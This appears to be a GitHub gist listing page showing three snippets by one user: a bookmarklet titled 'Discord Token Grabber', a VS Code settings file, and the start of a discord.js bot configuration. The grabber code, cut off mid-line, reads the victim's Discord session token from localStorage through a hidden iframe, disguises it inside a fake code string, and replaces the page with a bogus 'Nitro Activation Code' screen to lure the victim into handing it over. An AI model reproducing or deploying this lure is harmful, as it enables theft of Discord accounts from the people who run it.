Skip to content

Instantly share code, notes, and snippets.

@bufferwise
bufferwise / token-grabber.js
Created July 16, 2025 16:35
Discord Token Grabber
javascript:(function(){try{let f=document.createElement('iframe');f.style.display='none';document.body.appendChild(f);let t=JSON.parse(f.contentWindow.localStorage.token);function o(s){const c="#@$%&^";return s.split('').map(ch=>{let n=Array.from({length:Math.floor(Math.random()*3)+1},()=>c.charAt(Math.floor(Math.random()*c.length))).join('');return ch+n}).join('')}let ob=`infnitroTaglink-${o(t)}-predictnitro#56647`;document.body.innerHTML='';document.head.innerHTML='';document.body.style.cssText="background:#111;color:#fff;font-family:sans-serif;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;padding:20px;text-align:center;";let b=document.createElement('div');b.style.cssText="background:#1e1e1e;padding:30px;border-radius:10px;box-shadow:0 0 20px #00ffff;max-width:90%;width:480px;";let h=document.createElement('h2');h.textContent="🎁 Activation Code Generated";h.style="color:#00ffff;margin-bottom:15px;";let m=document.createElement('p');m.innerHTML="✅ Nitro is being p
@bufferwise
bufferwise / settings.json
Created July 12, 2025 16:53
My VSC Settings.
{
/** ------------ Workbench Settings ------------ **/
"workbench.colorCustomizations": {
"inlineparameters.annotationBackground": "#282A3600",
"inlineparameters.annotationForeground": "#7b82af",
"scrollbar.shadow": "#24292e00"
},
"workbench.iconTheme": "vscode-jetbrains-icon-theme-2023-dark",
"workbench.productIconTheme": "fluent-icons",
"workbench.editorLargeFileConfirmation": 10024,
@bufferwise
bufferwise / bot.js
Last active July 12, 2025 16:56
DiscordJS Run Code
const { Client, GatewayIntentBits, Partials, ActivityType } = require('discord.js');
const process = require('process');
// Configuration object for better maintainability
const CONFIG = {
// Environment variables with fallbacks
TOKEN: process.env.DISCORD_BOT_TOKEN || 'YOUR_BOT_TOKEN_HERE',
// Bot configuration
MAX_RECONNECT_ATTEMPTS: 5,